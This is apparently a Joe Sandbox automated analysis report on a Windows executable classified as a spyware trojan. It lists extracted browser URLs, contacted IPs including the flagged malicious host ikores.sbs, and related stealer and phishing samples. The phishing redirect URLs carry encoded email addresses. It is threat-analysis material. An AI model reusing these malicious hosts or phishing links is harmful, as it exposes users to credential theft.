                                                              https://duckduckgo.com/?q=chrome.exe, 00000010.00000003.2696966884.000078C400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661229181.000078C400C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2731046404.000078C400C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2656474444.000078C400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2729409445.000078C4009DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2685858348.000078C400C58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://chrome.google.com/webstorechrome.exe, 00000010.00000003.2656940206.000078C400F40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://drive-daily-2.corp.google.com/chrome.exe, 00000010.00000003.2641552249.000078C4004CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://polymer.github.io/PATENTS.txtchrome.exe, 00000010.00000003.2660325626.000078C400F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660907593.000078C400A5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660364108.000078C401070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661059265.000078C400FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660872042.000078C400CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2659915954.000078C401044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661381988.000078C4010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661266172.000078C40040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660023682.000078C401054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660952834.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660054702.000078C4010A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661523381.000078C40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2726245075.000078C4002F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=KFUAIW.10.drfalse
                                                                        high
                                                                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta9R1D2D.10.drfalse
                                                                          high
                                                                          https://chrome.google.com/webstore?hl=en3chrome.exe, 00000010.00000002.2733944167.000078C40116C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://issuetracker.google.com/161903006chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.ecosia.org/newtab/chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, KFUAIW.10.drfalse
                                                                              high
                                                                              https://drive-daily-1.corp.google.com/chrome.exe, 00000010.00000003.2641552249.000078C4004CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://drive-daily-5.corp.google.com/chrome.exe, 00000010.00000002.2726413038.000078C400318000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://duckduckgo.com/favicon.icochrome.exe, 00000010.00000003.2696966884.000078C400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661229181.000078C400C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2731046404.000078C400C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2656474444.000078C400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2685858348.000078C400C58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 00000010.00000002.2733772531.000078C4010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2728286701.000078C4007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2726971757.000078C400528000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 00000010.00000002.2729233845.000078C400978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2726865760.000078C4004D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2728286701.000078C4007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2733642541.000078C400FF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://drive-daily-3.corp.googlP2chrome.exe, 00000010.00000002.2726413038.000078C400318000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://anglebug.com/3078chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://anglebug.com/7553chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://anglebug.com/5375chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://anglebug.com/5371chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://anglebug.com/4722chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://m.google.com/devicemanagement/data/apichrome.exe, 00000010.00000002.2725847154.000078C40020C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://developer.chrome.com/extensions/external_extensions.html)chrome.exe, 00000010.00000002.2725437117.000078C400168000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 00000010.00000002.2728286701.000078C4007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2726971757.000078C400528000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2733079553.000078C400EF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://anglebug.com/7556chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://chromewebstore.google.com/chrome.exe, 00000010.00000002.2724689572.000078C40000C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://drive-preprod.corp.google.com/chrome.exe, 00000010.00000002.2726413038.000078C400318000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://google-ohttp-relay-join.fastly-edge.com/:mchrome.exe, 00000010.00000003.2690086393.000078C4015AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2690031645.000078C4015A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesHDBAI5.10.drfalse
                                                                                                high
                                                                                                https://clients4.google.com/chrome-syncchrome.exe, 00000010.00000002.2725770050.000078C4001D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000010.00000003.2686970809.000078C40140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://unisolated.invalid/achrome.exe, 00000010.00000002.2729999238.000078C400A2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://anglebug.com/6692chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://issuetracker.google.com/258207403chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://google-ohttp-relay-join.fastly-edge.com/flchrome.exe, 00000010.00000003.2690086393.000078C4015AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2690031645.000078C4015A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://anglebug.com/3502chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://anglebug.com/3623chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://anglebug.com/3625chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://anglebug.com/3624chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://docs.google.com/presentation/Jchrome.exe, 00000010.00000002.2727760443.000078C400702000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://anglebug.com/5007chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2727977288.000078C400740000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://drive.google.com/drive/installwebapp?usp=chrome_defaultchrome.exe, 00000010.00000002.2728286701.000078C4007D9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2726601425.000078C40039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2727760443.000078C400702000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://anglebug.com/3862chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000010.00000003.2663369383.000078C400F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661471400.000078C400344000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2657880853.000078C400F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2654363786.000078C400D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2656940206.000078C400F40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.ecosia.org/search?q=&addon=opensearchchrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://ogs.google.com/widget/callout?prid=19044659chrome.exe, 00000010.00000002.2744123721.000078C401CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2696757712.000078C401344000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2693773778.000078C401CE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://anglebug.com/4836chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://issuetracker.google.com/issues/166475273chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://ch.search.yahoo.com/favicon.icochrome.exe, 00000010.00000003.2696966884.000078C400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661229181.000078C400C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2731046404.000078C400C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2656474444.000078C400C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2685858348.000078C400C58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29chrome.exe, 00000010.00000003.2686970809.000078C40140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://anglebug.com/8280tychrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://docs.google.com/presentation/:chrome.exe, 00000010.00000002.2727760443.000078C400702000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://anglebug.com/4384chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://mail.google.com/mail/?tab=rm&amp;ogblchrome.exe, 00000010.00000002.2726754686.000078C400464000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://anglebug.com/3970chrome.exe, 00000010.00000002.2730999362.000078C400C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653702295.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2650227930.000078C400388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2653673202.000078C400388000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePWchrome.exe, 00000010.00000002.2733642541.000078C400FF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certschrome.exe, 00000010.00000002.2729409445.000078C4009DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://policies.google.com/chrome.exe, 00000010.00000002.2729480786.000078C400A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://apis.google.comchrome.exe, 00000010.00000002.2744123721.000078C401CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2696757712.000078C401344000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2693773778.000078C401CE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://google-ohttp-relay-join.fastly-edge.com/Ulchrome.exe, 00000010.00000003.2690086393.000078C4015AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2690031645.000078C4015A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://polymer.github.io/CONTRIBUTORS.txtchrome.exe, 00000010.00000003.2660325626.000078C400F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660907593.000078C400A5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660364108.000078C401070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661059265.000078C400FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660872042.000078C400CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2659915954.000078C401044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661381988.000078C4010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661266172.000078C40040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660023682.000078C401054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660952834.000078C40089C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2660054702.000078C4010A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2661523381.000078C40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2726245075.000078C4002F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://labs.google.com/search?source=ntpchrome.exe, 00000010.00000002.2726754686.000078C400464000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        • No. of IPs < 25%
                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                        • 75% < No. of IPs
                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                        239.255.255.250
                                                                                                                                        unknownReserved
                                                                                                                                        unknownunknownfalse
                                                                                                                                        172.217.21.36
                                                                                                                                        www.google.comUnited States
                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                        149.154.167.99
                                                                                                                                        t.meUnited Kingdom
                                                                                                                                        62041TELEGRAMRUfalse
                                                                                                                                        5.75.212.196
                                                                                                                                        ikores.sbsGermany
                                                                                                                                        24940HETZNER-ASDEtrue
                                                                                                                                        IP
                                                                                                                                        127.0.0.1
                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                        Analysis ID:1569757
                                                                                                                                        Start date and time:2024-12-06 09:39:47 +01:00
                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                        Overall analysis duration:0h 6m 14s
                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                        Report type:full
                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                        Number of analysed new started processes analysed:19
                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                        Technologies:
                                                                                                                                        • HCA enabled
                                                                                                                                        • EGA enabled
                                                                                                                                        • AMSI enabled
                                                                                                                                        Analysis Mode:default
                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                        Sample name:Yn13dTQdcW.exe
                                                                                                                                        renamed because original name is a hash value
                                                                                                                                        Original Sample Name:82ccd973e00420a4768bc76d2f442f52.exe
                                                                                                                                        Detection:MAL
                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@38/37@5/5
                                                                                                                                        EGA Information:
                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                        HCA Information:
                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                        • Number of executed functions: 24
                                                                                                                                        • Number of non-executed functions: 41
                                                                                                                                        Cookbook Comments:
                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                        • Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.17.46, 173.194.222.84, 172.217.17.78, 142.250.181.99
                                                                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                        TimeTypeDescription
                                                                                                                                        03:40:35API Interceptor1x Sleep call for process: Yn13dTQdcW.exe modified
                                                                                                                                        03:40:41API Interceptor721x Sleep call for process: Suicide.com modified
                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        239.255.255.250Voicemail_+Transcription001799.docxGet hashmaliciousUnknownBrowse
                                                                                                                                          https://l.user-edenred-meyclub.kadeos.com/rts/go2.aspx?h=3782162&tp=i-1NHD-99-2ZH4-1HXNG6-20-1PPCf-1c-11KR2-1HWQl1-lBCrdGKkeH-2H4ZZZ&pi=6DvBMG0gjxmwWZBUOtvVSRjwHoaoPzxcEck6D3-7U78&x=i-1NHD-99-2ZH4-1HXNG6-20-1PPCf-1c-11KR2-1HWQl1-lBCrdGKkeH-2H4ZZZ%7c612254%7c1175284778&hp2=b88d9aa5cea778a386a66e248545bc7b83591c6077edf33fe6b47536c9d63d12Get hashmaliciousUnknownBrowse
                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                              https://google.sk/url?q=gcwogJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/fvh1/emVnZXJ0dmFuZGVybGluZ2VuQHJveWFsZmxvcmFob2xsYW5kLmNvbQ==%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9AGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                https://track-004.blogspot.comGet hashmaliciousUnknownBrowse
                                                                                                                                                  UNIQUE Meeting today __jo.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                      https://google.sk/url?q=lagrgJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fugurozsemerci.com.tr%2f4yoya/fjzc/bWF4aW1lLmRlbm91ZGVuQHVuaXF1ZS5ubA==%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9AGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        https://fujipharma.box.com/s/pezxwn32zbr37fbrrrqh18g3y8eulbk2Get hashmaliciousUnknownBrowse
                                                                                                                                                          Scan_03774843.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                            149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                            • telegram.org/img/favicon.ico
                                                                                                                                                            http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                            • telegram.org/
                                                                                                                                                            http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                            • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                            http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                            • telegram.org/
                                                                                                                                                            http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                            • telegram.org/
                                                                                                                                                            http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                            • telegram.org/?setln=pl
                                                                                                                                                            http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                            • telegram.org/
                                                                                                                                                            http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                            • telegram.dog/
                                                                                                                                                            LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                            • t.me/cinoshibot
                                                                                                                                                            jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                            • t.me/cinoshibot
                                                                                                                                                            5.75.212.196Setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                              Setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                t.mehttps://track-004.blogspot.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 50.87.184.136
                                                                                                                                                                Setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                Setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                Ttok18.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                jtkhikadjthsad.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                o26qobnkQI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                xoJxSAotVM.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                • 149.154.167.99
